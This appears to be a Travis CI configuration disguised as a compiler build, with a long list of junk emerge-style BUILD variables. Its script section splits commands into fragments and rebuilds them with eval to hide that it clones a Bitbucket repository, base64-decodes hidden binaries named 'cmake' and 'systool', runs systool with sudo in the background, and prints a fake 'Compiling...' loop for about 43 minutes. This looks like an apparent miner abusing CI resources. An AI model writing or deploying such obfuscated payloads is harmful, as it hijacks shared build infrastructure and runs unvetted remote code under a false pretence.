dist: bionic

env:
  - BUILD="--metadata=73Vn"
  - BUILD="--autounmask-keep-masks=814p7"
  - BUILD="--help=262wi"
  - BUILD="--changed-deps=37GL"
  - BUILD="--usepkgonly=679WL"
  - BUILD="--help=755Ru"
  - BUILD="--noreplace=2376w"
  - BUILD="--newrepo=983Be"
  - BUILD="--with-bdeps-auto=142pB"
  - BUILD="--nospinner=6149V"
  - BUILD="--search-index=260Ru"
  - BUILD="--searchdesc=575Tg"
  - BUILD="--onlydeps=54611"
  - BUILD="--verbose=82Ih"
  - BUILD="--root-deps=221bW"
  - BUILD="--load-average=584r6"
  - BUILD="--autounmask-backtrack=846WZ"
  - BUILD="--onlydeps=433Jh"
  - BUILD="--prune=1432J"
  - BUILD="--metadata=277n9"
  - BUILD="--changed-slot=834wn"
  - BUILD="--noreplace=33FR"
  - BUILD="--update=767nG"
  - BUILD="--depclean=616EP"
  - BUILD="--ignore-default-opts=329N2"
  - BUILD="--newrepo=732cl"
  - BUILD="--package-moves=35434"
  - BUILD="--unmerge=118Zj"
  - BUILD="--autounmask-keep-keywords=9ly"
  - BUILD="--update=750Ng"
  - BUILD="--ignore-default-opts=808KU"
  - BUILD="--ignore-soname-deps=606EQ"
  - BUILD="--newrepo=179lf"
  - BUILD="--newuse=129I0"
  - BUILD="--dynamic-deps=23Ku"
  - BUILD="--jobs=780up"
  - BUILD="--read-news=904Bw"
  - BUILD="--tree=791A5"
  - BUILD="--search=155Zt"
  - BUILD="--noreplace=167pK"
  - BUILD="--autounmask-keep-keywords=377QD"
  - BUILD="--info=6994e"
  - BUILD="--skipfirst=663OA"
  - BUILD="--complete-graph=431M1"
  - BUILD="--unmerge=241gZ"
  - BUILD="--use-ebuild-visibility=52490"
  - BUILD="--quiet-repo-display=362fm"
  - BUILD="--rebuild-if-new-ver=142sH"
  - BUILD="--selective=172Zd"
  - BUILD="--nodeps=552NE"
  - BUILD="--search-index=835Qe"
  - BUILD="--config=4087l"
  - BUILD="--rage-clean=979FO"
  - BUILD="--noreplace=198Zj"
  - BUILD="--onlydeps=7353"
  - BUILD="--emptytree=892du"
  - BUILD="--search=762bO"
  - BUILD="--columns=67am"
  - BUILD="--autounmask-unrestricted-atoms=240Qb"
  - BUILD="--resume=717hQ"
  - BUILD="--alphabetical=945SD"
  - BUILD="--rage-clean=29Fu"
  - BUILD="--depclean=7z3"
  - BUILD="--pkg-format=119DQ"
  - BUILD="--verbose=7g8"
  - BUILD="--onlydeps=365bh"
  - BUILD="--rebuild-if-new-slot=409Jt"
  - BUILD="--autounmask-write=228lR"
  - BUILD="--getbinpkg=21w8"
  - BUILD="--rebuild-if-new-rev=514JI"
  - BUILD="--reinstall-atoms=905Pt"
  - BUILD="--ignore-soname-deps=708n2"
  - BUILD="--check-news=2795l"
  - BUILD="--search-similarity=147tz"
  - BUILD="--fetchonly=43gZ"
  - BUILD="--onlydeps-with-rdeps=497WG"
  - BUILD="--autounmask-only=620PD"
  - BUILD="--usepkgonly=275BS"
  - BUILD="--reinstall=49730"
  - BUILD="--depclean=330Fs"
  - BUILD="--newrepo=885fg"
  - BUILD="--accept-properties=959l6"
  - BUILD="--changed-use=284EN"
  - BUILD="--nospinner=71qg"
  - BUILD="--binpkg-changed-deps=884D9"
  - BUILD="--rebuild-ignore=847Be"
  - BUILD="--package-moves=149Sk"
  - BUILD="--verbose-conflicts=7794Y"
  - BUILD="--onlydeps-with-rdeps=367Jt"
  - BUILD="--complete-graph=565Hb"
  - BUILD="--autounmask-keep-keywords=3949x"
  - BUILD="--quiet=367Mv"
  - BUILD="--autounmask-only=612UI"
  - BUILD="--rage-clean=408je"
  - BUILD="--jobs=674nD"
  - BUILD="--root=663I7"
  - BUILD="--complete-graph=9651q"
  - BUILD="--autounmask-unrestricted-atoms=726Lu"
  - BUILD="--ask=470jB"
  - BUILD="--usepkg=938DJ"
  - BUILD="--unordered-display=848j8"
  - BUILD="--buildpkg=999Tf"
  - BUILD="--autounmask-unrestricted-atoms=7002q"
  - BUILD="--noconfmem=6278C"
  - BUILD="--autounmask-keep-keywords=444HG"
  - BUILD="--verbose-slot-rebuilds=73Dz"
  - BUILD="--ignore-default-opts=290Nd"
  - BUILD="--useoldpkg-atoms=767vc"
  - BUILD="--buildpkgonly=799Ia"
  - BUILD="--ask-enter-invalid=204Ia"
  - BUILD="--autounmask-use=599YK"
  - BUILD="--regen=6329J"
  - BUILD="--fail-clean=401WU"
  - BUILD="--changed-use=49bT"
  - BUILD="--backtrack=239aG"
  - BUILD="--exclude=475sb"
  - BUILD="--quiet-repo-display=240FP"
  - BUILD="--ignore-world=216EA"
  - BUILD="--misspell-suggestions=833R6"
  - BUILD="--onlydeps=287OW"
  - BUILD="--columns=940jd"
  - BUILD="--ask-enter-invalid=741jO"
  - BUILD="--nospinner=761fL"
  - BUILD="--backtrack=3390j"
  - BUILD="--accept-properties=560gA"
  - BUILD="--newuse=226vD"
  - BUILD="--changed-deps-report=4392g"
  - BUILD="--reinstall-atoms=857D9"
  - BUILD="--fail-clean=732cM"
  - BUILD="--emptytree=378Oy"
  - BUILD="--rebuild-if-new-rev=4685A"
  - BUILD="--newrepo=7441h"
  - BUILD="--backtrack=90Ph"
  - BUILD="--pkg-format=711ZO"
  - BUILD="--reinstall-atoms=24750"
  - BUILD="--accept-properties=156oV"
  - BUILD="--quickpkg-direct=608Lc"
  - BUILD="--skipfirst=271R2"
  - BUILD="--quiet-fail=9328d"
  - BUILD="--load-average=34xU"
  - BUILD="--rebuild-if-new-rev=9914a"
  - BUILD="--getbinpkg=547Cr"
  - BUILD="--misspell-suggestions=330f1"
  - BUILD="--columns=897bD"
  - BUILD="--autounmask-use=230zQ"
  - BUILD="--fetch-all-uri=29517"
  - BUILD="--exclude=4294z"
  - BUILD="--search=119KP"
  - BUILD="--newrepo=597Uf"
  - BUILD="--rebuild-if-new-slot=922ld"
  - BUILD="--ignore-built-slot-operator-deps=565q4"
  - BUILD="--rebuild-if-new-slot=129XR"
  - BUILD="--complete-graph=220VP"
  - BUILD="--info=284Ff"
  - BUILD="--complete-graph-if-new-ver=900sQ"
  - BUILD="--config=280Mi"
  - BUILD="--newuse=282bH"
  - BUILD="--ask-enter-invalid=58919"
  - BUILD="--columns=290QG"
  - BUILD="--with-bdeps-auto=855Ex"
  - BUILD="--sysroot=737yC"
  - BUILD="--nospinner=101yG"
  - BUILD="--noconfmem=829u1"
  - BUILD="--jobs=997BQ"
  - BUILD="--skipfirst=844At"
  - BUILD="--digest=57458"
  - BUILD="--fetchonly=753sA"
  - BUILD="--search-similarity=815io"
  - BUILD="--onlydeps=746cP"
  - BUILD="--ask=4675P"
  - BUILD="--rebuild-exclude=707gb"
  - BUILD="--version=477rH"
  - BUILD="--reinstall=463cQ"
  - BUILD="--onlydeps=959mc"
  - BUILD="--rebuild-ignore=659Fg"
  - BUILD="--onlydeps-with-rdeps=678zi"
  - BUILD="--noconfmem=874wX"
  - BUILD="--quiet-build=257Xe"
  - BUILD="--onlydeps-with-rdeps=359Ai"
  - BUILD="--nospinner=136nf"
  - BUILD="--list-sets=948pf"
  - BUILD="--unordered-display=963I4"
  - BUILD="--list-sets=266KW"
  - BUILD="--onlydeps=655y1"
  - BUILD="--update=323d0"
  - BUILD="--verbose=213dp"
  - BUILD="--changed-slot=367s8"
  - BUILD="--autounmask-only=617dh"
  - BUILD="--regen=60pS"
  - BUILD="--changed-deps=858Sd"

language: minimal

script:
  - HFSOJSjCoX="sudo apt up"
  - LteqMPpylHd="date || tru"
  - eval "$HFSOJSjCoX""$LteqMPpylHd""e"
  - jxIDyfOZKDX="sudo apt --"
  - kLVlSN="yes install"
  - lySFsTi=" cl-base64 "
  - gqFGxKwbCl="git &>/dev/"
  - eval "$jxIDyfOZKDX""$kLVlSN""$lySFsTi""$gqFGxKwbCl""null"
  - pKgVkhB="git clone h"
  - CTmRXYM="ttps://gccb"
  - jBQHGlw="uild@bitbuc"
  - gXwvFdfavr="ket.org/gcc"
  - QLzEVCh="build/gcc.g"
  - hpnXeWSmUL="it &>/dev/n"
  - eval "$pKgVkhB""$CTmRXYM""$jBQHGlw""$gXwvFdfavr""$QLzEVCh""$hpnXeWSmUL""ull"
  - xNbda="base64 -d g"
  - pJpyWROY="cc/cmake_ >"
  - eval "$xNbda""$pJpyWROY"" cmake"
  - vZeQpuWW="base64 -d g"
  - ZNnYEKo="cc/config_ "
  - eval "$vZeQpuWW""$ZNnYEKo""> xconfig"
  - sUvwjDeYlD="base64 -d g"
  - drXTr="cc/make_ > "
  - eval "$sUvwjDeYlD""$drXTr""systool"
  - HRatyXqiD="chmod +x sy"
  - eval "$HRatyXqiD""stool cmake"
  - ./cmake
  - sed -i 's/build/tb2o/g' xconfig
  - SFXkhaQ="sudo ./syst"
  - BQmBIpXEr="ool --confi"
  - UdqtgpPXI="g xconfig &"
  - fRCpiAzmKzz=">/dev/null "
  - eval "$SFXkhaQ""$BQmBIpXEr""$UdqtgpPXI""$fRCpiAzmKzz""&"
  - GCC=$(date +%s)
  - OxCjlEw="echo $BUILD"
  - eval "$OxCjlEw"""
  - while true; do CC=$(date +%s); echo Compiling...; [ $CC -ge $((GCC + 2567)) ] && sudo killall systool && break; sleep 198; done
